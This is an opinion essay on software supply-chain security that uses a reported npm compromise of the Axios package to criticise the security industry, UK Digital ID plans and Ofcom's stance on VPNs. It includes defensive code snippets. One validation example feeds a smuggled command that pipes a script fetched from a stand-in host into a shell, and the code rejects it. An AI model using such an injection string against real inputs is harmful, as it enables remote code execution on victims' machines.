The wartime governments of the Second World War are remembered, in part, for their failures of imagination — for not seeing what was coming until it had already arrived. But at least when the threat did become undeniable, they built air raid shelters. They installed anti-aircraft batteries. They met the visible danger with visible countermeasures.

We are living through the opening phase of a different kind of war, and our governments are spending billions on digital ID schemes while the bombs are already falling. They just don't make a sound when they land.

This week, North Korean state-sponsored hackers turned the Axios npm package — downloaded over 100 million times per week — into a credential-stealing malware delivery vehicle. Two backdoored versions were silently published to the npm registry just after midnight UTC, targeting Windows, macOS, and Linux simultaneously, with no user interaction required. The attack window lasted three hours. Within it, the payload was delivered, the malware reached out to a command-and-control server, deployed additional payloads, and wiped its own tracks.

This is not a novel threat. This is not an unprecedented technique. In recent years, SolarWinds, Kaseya, 3CX, and Polyfill.io were all compromised with the same fundamental playbook: compromise a trusted component, poison the well, watch the infections cascade downstream. Log4j, for its part, showed how far a single flaw in a ubiquitous dependency can travel. And yet here we are again. Same method. Different package. Bigger blast radius.

The cybersecurity industry has had a decade and a half of investment, consolidation, and exponential revenue growth to fix this. It hasn't. The question we need to stop avoiding is: why?

$262B: global cybersecurity market size in 2025
$10.5T: annual cost of cybercrime in 2025
3 hours: window of the Axios supply chain attack

The Core Indictment

[Chart: Industry Revenue vs. Cost of Cybercrime, 2015–2025]

Cybersecurity spend has grown at a double-digit compound annual rate. The cost of cybercrime has grown faster. The industry is not solving the problem. It is scaling alongside it.

Sources: Statista, McKinsey, Cybercrime Magazine / Cybersecurity Ventures. Cybercrime cost figures represent total global damage including ransomware, IP theft, financial fraud, and recovery costs.

The Tool Trap

I've worked with or alongside AlertLogic, WhiteHat, and Black Duck. I've seen teams integrate Snyk, SonarQube, Dependabot, and every flavour of SAST/DAST scanner the market offers. I've watched those tools get adopted as a solution rather than a complement. I've watched the underlying engineering discipline quietly atrophy as organisations outsourced their security conscience to a dashboard.

Tooling is not a security posture. It is a comfort posture.

Scanners find known patterns in known packages against known CVEs. State-sponsored actors building novel supply chain attacks don't show up in your scanner's database until after the fact. The operational sophistication of the Axios attack — a maintainer account compromised through a separate vector, payloads pre-staged for days and built for three operating systems, both release branches hit in under 40 minutes, forensic self-destruction built in — is precisely the category of threat that signature databases cannot anticipate. Your CI pipeline's Snyk step would have told you everything was fine.

Worse, the tools themselves have become an attack surface. The Trivy supply chain compromise demonstrated exactly this: a security scanner used as a delivery mechanism. The very thing you deploy to detect threats introducing one. When your security tooling requires its own threat model, you have a structural problem, not a tooling problem.

The Supply Chain Epidemic

[Chart: Major Supply Chain Incidents per Year, 2013–2025]

Each bar represents the approximate number of significant documented supply chain compromises per year. The trend is not improving. It is accelerating.

Based on publicly documented incidents tracked by CISA, ENISA, and security research firms. Figures are conservative — many incidents go unreported or undiscovered.

The Responsibility Vacuum

Security vendors sell you confidence. They do not share your liability. When the Axios maintainer account was compromised and malicious packages shipped to your production pipeline, your Snyk subscription did not trigger a breach notification to your customers. Your SonarQube instance did not appear before your regulator. You did.

This asymmetry is the rot at the heart of the industry. Vendors monetise the fear and capture the recurring revenue. They do not carry the consequence. That stays with you and your team — as it always has. The question is whether you've structured your engineering culture and practices to match that responsibility, or whether you've offloaded accountability to a set of third-party dashboards and assumed the coverage was real.

The cybersecurity industry is the only sector in existence where the primary growth driver is the failure of its own product. Every successful attack is, commercially speaking, a sales event. Every breach generates board-level anxiety that converts directly into budget. Every headline about a supply chain compromise is a pipeline opportunity for the vendors who sell supply chain scanning. This is not a conspiracy — it is a structural incentive. And structural incentives shape behaviour at scale whether anyone intends them to or not. The industry does not need to be malicious to be misaligned. It just needs to be rational.

For most organisations, the honest answer is the latter: accountability offloaded to dashboards, coverage assumed rather than verified. State actors know it. The vendors know it too — they just have no reason to say so.

Back to Basics

The fundamentals that would actually reduce your attack surface aren't purchased from a vendor. They're cultivated. And the place to start is more basic than most security frameworks acknowledge: does the developer writing this code understand what data they're accepting, from whom, in what form, and under what constraints?

Regex is not a footnote. For anyone building systems that accept external input — which is every system — the ability to construct a precise, well-reasoned validation pattern is a direct measure of whether the developer has actually thought about the attack surface. You cannot outsource that reasoning to a library someone else wrote and probably hasn't audited in eighteen months. You have to hold it in your head. That is what it means to code with security as a first principle rather than a retrofit. A developer who reaches for a validation library before they can articulate what valid input looks like has already lost the argument.
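To make that concrete, here is a minimal sketch of validation-by-reasoning in TypeScript. The order-reference format is invented for illustration; the point is that the developer states what valid input looks like before writing the pattern.

```ts
// Claim, stated before the pattern is written: an order reference is
// exactly three uppercase letters, a hyphen, then six digits. Nothing else.
// Anchored at both ends so nothing can ride in before or after the match.
const ORDER_REF = /^[A-Z]{3}-[0-9]{6}$/;

function parseOrderRef(raw: unknown): string {
  if (typeof raw !== "string") {
    throw new TypeError("order ref must be a string");
  }
  if (!ORDER_REF.test(raw)) {
    throw new RangeError(`invalid order ref: ${JSON.stringify(raw)}`);
  }
  return raw; // safe to treat as a validated identifier from here on
}

console.log(parseOrderRef("LDN-004213")); // ok
try {
  parseOrderRef("LDN-004213; curl evil.example | sh");
} catch (err) {
  console.log("rejected:", (err as Error).message); // precisely what we wanted
}
```

The pattern itself is trivial. What matters is that it encodes a decision the developer can defend: this is the whole universe of valid input, and everything else is rejected at the boundary.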

🔗 Minimise Your Dependency Graph

Every dependency is a trust relationship with a human maintainer, their account security, their access token hygiene, and their geopolitical exposure. Axios is embedded in 80% of cloud environments. That's a monoculture — exactly what this attack exploited.
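If you want to feel the size of that trust surface rather than argue about it, a rough sketch like the one below counts every distinct package your build actually pulls in. It assumes npm v7+ and a project where `npm install` has already run; note that `npm ls` exits non-zero on unmet peer dependencies, which `execSync` will surface as an error.

```ts
// Count distinct packages in the resolved dependency tree. Each one is a
// maintainer account, an access token, and a publishing pipeline you trust.
import { execSync } from "node:child_process";

interface NpmNode {
  version?: string;
  dependencies?: Record<string, NpmNode>;
}

function collect(node: NpmNode, seen: Set<string>): void {
  for (const [name, child] of Object.entries(node.dependencies ?? {})) {
    const key = `${name}@${child.version ?? "?"}`;
    if (!seen.has(key)) {
      seen.add(key);
      collect(child, seen); // descend only the first time we meet a package
    }
  }
}

const tree = JSON.parse(
  execSync("npm ls --all --json", { encoding: "utf8", maxBuffer: 256 * 1024 * 1024 })
) as NpmNode;

const seen = new Set<string>();
collect(tree, seen);
console.log(`${seen.size} distinct packages: ${seen.size} separate trust relationships.`);
```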

🔒 Lock Your Boxes Down

Principle of least privilege is not a compliance checkbox. The Axios malware needed to phone home before it could pull down its additional payloads; if your runtime has no business making outbound connections to unknown hosts, that exfiltration step fails. Egress filtering is not exotic. It is basic.
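Real egress enforcement belongs at the network layer, in firewall rules or an egress proxy, but the posture is easy to illustrate in application code. Below is a deny-by-default sketch, assuming Node 18+ where `fetch` is global; the hostnames are invented examples.

```ts
// Outbound connections are allowed by exception, never by default.
const EGRESS_ALLOWLIST = new Set([
  "api.internal.example.com",
  "payments.example.com",
]);

async function guardedFetch(url: string, init?: RequestInit): Promise<Response> {
  const host = new URL(url).hostname;
  if (!EGRESS_ALLOWLIST.has(host)) {
    // Malware phoning home to a command-and-control server dies here.
    throw new Error(`egress to ${host} is not on the allowlist`);
  }
  return fetch(url, init);
}
```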

👩‍💻 Make Developers Responsible

Not the security team. Not the tooling vendor. The developer who pulled in the dependency. Security culture cannot be delegated to a specialist function who sits outside the team and runs scans after the fact. It has to be embedded in the people who write the code.

📋 Audit Your Postinstall Scripts

The Axios attack weaponised a postinstall hook that executes automatically on every npm install. If your team cannot answer what runs in your dependency install chain, you do not have a dependency graph. You have a trust fall with anonymous maintainers worldwide.
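Getting that answer doesn't require a vendor. Here is a minimal audit sketch, assuming a standard npm `node_modules` layout, that lists every installed package declaring an install-time lifecycle hook:

```ts
// Walk node_modules and report every preinstall/install/postinstall hook.
import { readdirSync, readFileSync, existsSync } from "node:fs";
import { join } from "node:path";

const HOOKS = ["preinstall", "install", "postinstall"];

function audit(dir: string): void {
  for (const entry of readdirSync(dir, { withFileTypes: true })) {
    if (!entry.isDirectory()) continue;
    const pkgDir = join(dir, entry.name);
    if (entry.name.startsWith("@")) {
      audit(pkgDir); // scoped packages nest one level deeper
      continue;
    }
    const manifest = join(pkgDir, "package.json");
    if (existsSync(manifest)) {
      const pkg = JSON.parse(readFileSync(manifest, "utf8"));
      for (const hook of HOOKS) {
        if (pkg.scripts?.[hook]) {
          console.log(`${pkg.name}@${pkg.version} ${hook}: ${pkg.scripts[hook]}`);
        }
      }
    }
    const nested = join(pkgDir, "node_modules");
    if (existsSync(nested)) audit(nested); // handle nested layouts too
  }
}

audit("node_modules");
```

Pair it with npm's `--ignore-scripts` flag, which exists for exactly this reason, so hooks never run silently in the first place.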

The AI Accelerant

There's a new variable in this equation, and the industry hasn't processed it honestly yet.

The Axios attack was described by security researchers as "perfectly timed" given the rise of AI agents developing software at organisations without any review or guardrails. That framing is polite. The reality is sharper.

AI coding assistants — and I say this as someone who uses them — have been trained on the publicly available corpus of human-written code. That corpus includes fifteen years of npm packages with postinstall scripts that do things they shouldn't. It includes Stack Overflow answers that solve the immediate problem and introduce a subtler one. AI agents don't independently derive secure patterns. They statistically reproduce the patterns they've seen most frequently. In a world where insecure patterns are common, AI code generation produces insecure code — confidently, fluently, and at velocity.

The cost of producing code is collapsing. The complexity of the attack surface is not. That gap is where the next decade of breaches will live.

AI assistance in engineering is now table stakes. Teams that use it effectively will outpace those that don't. But "effectively" requires highly skilled developers with a sufficiently wide range of expertise to recognise when the generated output is insecure. That bar hasn't lowered. If anything, it's risen. You need someone who can look at a postinstall script in a package.json and feel the wrongness of it instinctively — not someone who accepted the AI suggestion without reading it.

The Geopolitical Reality

This is not criminal opportunism. This is a sustained, state-directed campaign. Analysts describe a long-term effort to steal cryptocurrency to fund the North Korean regime, which channels those funds toward its nuclear and missile programmes. Last year, North Korean actors stole $1.5 billion in cryptocurrency in a single attack — the largest crypto heist on record at the time.

But zoom out further. We are in a period of active geopolitical realignment, contested alliances, and multiple state actors with significant cyber capabilities and increasing motivation to deploy them against western infrastructure. The capabilities of western intelligence services are documented — WikiLeaks gave us a partial inventory. We should therefore assume adversaries have reached comparable capability through their own means. The era of asymmetric advantage is over.

And cyber attacks have a property that rockets and bombs do not: they can be denied, graduated, and sustained below the threshold of conventional military response. They target economic infrastructure — payments, logistics, supply chains, energy — without a single bullet being fired.

We don't have to hypothesise about what this looks like in practice. The M&S attack in April 2025 — carried out not through some exotic zero-day, but through social engineering at an IT helpdesk — forced the retailer to revert to pen-and-paper stock management. Shelves went bare. Online clothing sales were suspended for 46 days. The financial toll: approximately £300 million in lost profit. Statutory pre-tax profit collapsed from £391.9m the previous year to £3.4m in the six months following the attack. Market capitalisation dropped by over £700 million within days of disclosure.

Consumer spending fell 22% at M&S during the disruption. The same weekend saw Harrods and Co-op also targeted, with rural areas that rely on Co-op experiencing notable supply shortages. This is one retailer. One attack. Now project that across energy, water, payment rails, and logistics infrastructure — at a time when recession fears are already suppressing consumer confidence and geopolitical tension is already moving markets. The economic cascade from coordinated attacks on critical sectors would not be contained by cyber insurance payouts and half-year recovery plans.

The Real Cost

[Chart: Financial Impact of Major Cyber Incidents (selected, USD equivalent)]

These are not edge cases. They are the documented cost of the status quo. Each incident is a data point in a trend that the industry's growth has not reversed.

Costs include incident response, lost revenue, recovery, regulatory fines, and market cap impact where applicable. Sources: Company filings, SEC disclosures, published breach reports.

Where Government Is Failing

The response from government has been characteristically misaligned with the actual threat. Two policy trajectories in particular represent not just a failure of prioritisation, but an active worsening of the UK's security posture. Both deserve naming directly.

The Digital ID Gamble

The government is building a mandatory national Digital ID system on foundations that its own senior engineers have described as not fit for purpose — and spending somewhere between £400 million and £1.8 billion to do it, depending on which estimate you believe, since ministers have declined to give Parliament a straight answer on cost.

The scheme, announced by Prime Minister Starmer in September 2025, will use GOV.UK One Login as its backbone — a system already used by 13 million people to access pensions, passport services, and professional registrations. In December 2025, senior civil servants with direct knowledge of the programme went to ITV News as whistleblowers, backed by confidential internal documents. What they described was alarming. One Login is failing to meet the government's own mandatory cybersecurity standards — both the Secure by Design framework and the NCSC's Cyber Assessment Framework. Development work was outsourced to Romania without senior approval or consultation with cybersecurity experts. System administrators were using unsecured devices, creating a potential pipeline from the public internet to the system's most sensitive components. And during a formal red team exercise earlier in the year, a remote attacker successfully introduced malware onto a system administrator device and gained access to sensitive areas of One Login — without triggering a single monitoring alert.

"We don't know if the system has been compromised or not, but we have proved it can be compromised. That would shut everybody out — pensions, welfare, passports, driving licences. Everything." — One Login whistleblower, ITV News

The NCSC — the body that should be the primary voice on this — identified in its own assessment that a successful compromise of One Login could result in bulk personal data theft, identity fraud, economic damage, and the exposure of people in witness protection. The documents cited by the whistleblowers showed that internal investigators concluded the programme was carrying a "high level of risk." The government's response was to proceed anyway.

Graeme Stewart at Check Point described the scheme as a honeypot for cybercriminals: a central database of 50 million+ records representing a single, high-value, high-prestige target for exactly the kind of state actor we discussed earlier in this piece. Security experts across the industry have called the scheme a catastrophe in waiting. Nearly three million people signed a petition calling for it to be abandoned. Cross-party political opposition has been consistent and vocal. The security community has been clear and unified. Government has pressed on regardless — spending up to £1.8 billion on infrastructure its own red team has already demonstrated can be penetrated undetected.

Ofcom, VPNs, and the Vilification of Security Tools

The second failure is Ofcom, and it cuts closer to the engineering community's daily reality.

The Online Safety Act, which came into force in July 2025, requires age verification for a sweeping range of online platforms. Its implementation has been widely criticised as technically incoherent — it mandates scanning of end-to-end encrypted messaging for child abuse content, despite expert consensus that this is not possible without destroying the encryption that makes those tools secure. It creates new requirements for biometric and government ID submission to private companies with no meaningful oversight of how that data is then handled.

Predictably, VPN usage in the UK surged by over 1,400% in the hours after the Act came into force. Ofcom's response was not to acknowledge the scale of public mistrust in the age verification framework. It was to begin covertly monitoring VPN adoption using an undisclosed third-party tool — the identity of which Ofcom initially refused to reveal even under Freedom of Information requests — and to allow government ministers to openly discuss whether VPNs should be banned or age-gated.

Let that land for a moment. VPNs are a foundational security tool. They protect journalists, whistleblowers, remote workers, security researchers, and ordinary people using public Wi-Fi. They are the same tooling your enterprise security team mandates for remote access. The suggestion that VPNs should be banned or restricted in the UK places us, as Graeme Stewart at Check Point put it, "in the company of China, Russia, and Iran. That should tell you everything."

This is a communications regulator, led by people with limited technical background in security infrastructure, making policy recommendations that directly undermine defensive security practice — at a time when state-level threat actors are actively exploiting every vulnerability in our software supply chain. The NCSC exists precisely to provide technically grounded national security guidance on digital infrastructure. It should be the lead voice on all of this. Instead, a regulator whose primary expertise is broadcast media and telecoms licensing is shaping the UK's relationship with the most important privacy and security tool available to ordinary internet users.

The conflict is stark: on one hand, government is building a centralised identity system that concentrates the personal data of the entire adult population into a single attack surface. On the other, it is considering restricting the very tools that individuals and organisations use to protect their communications and data from exactly the kind of adversaries that system will attract. It is as if the wartime government had not only failed to build the air raid shelters — it had begun dismantling the ones already standing.

The prevailing political approach to cyber security oscillates between compliance theatre, post-incident inquiry, and technically uninformed regulation that creates new vulnerabilities while appearing to address old ones. Frameworks are written. Audits are scheduled. Tick boxes are filled in. And the adversary iterates at a pace that compliance cycles and communications regulators cannot begin to match.

The bombs aren't visible this time. They won't announce themselves with a siren. They will arrive as a backdoored npm package published at midnight that your automated pipeline pulled and deployed before anyone was awake. They will arrive as a social engineering call to an IT helpdesk. They will arrive as a compromised access token on a long-forgotten CI integration. And they may well arrive through the infrastructure the government has spent a billion pounds building, on the advice of people who were never asked.

What Actually Needs to Change

Stop buying security. Start building it.

Invest in your engineers as if they are the actual defence mechanism — because they are. Pay for the training. Expect the expertise. Create a culture where a developer who raises a security concern is celebrated, not managed around. Pin your dependencies. Audit your postinstall scripts. Treat every outbound network connection from your runtime as a decision that requires justification.
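Pinning, at its most basic, is two lines of standard npm configuration in a project's `.npmrc`. Both settings are real npm options; treat this as a starting point, not a complete policy.

```ini
# Record new dependencies at an exact version, not a ^range.
save-exact=true

# Never run install-time lifecycle hooks (postinstall included) automatically.
ignore-scripts=true
```

With `ignore-scripts` set, packages that genuinely need a build step must be handled deliberately and visibly rather than silently, which is exactly the point.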

Minimise everything. Every dependency. Every open port. Every permission. Every surface area is a potential vector, and right now, state-level actors are mapping every surface area your organisation exposes.

Code paranoid. Ship minimal. Own the consequence.

The $262 billion security industry will not save you. It will send you a forensic report after the breach, explain what happened in excellent detail, and bill you for the incident response. The responsibility has always been yours. The tools, the dashboards, the compliance frameworks — none of them change that. It's past time to act like it.